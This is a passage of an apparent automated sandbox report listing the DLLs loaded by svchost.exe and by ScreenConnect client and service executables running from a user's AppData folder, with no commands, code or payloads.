                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
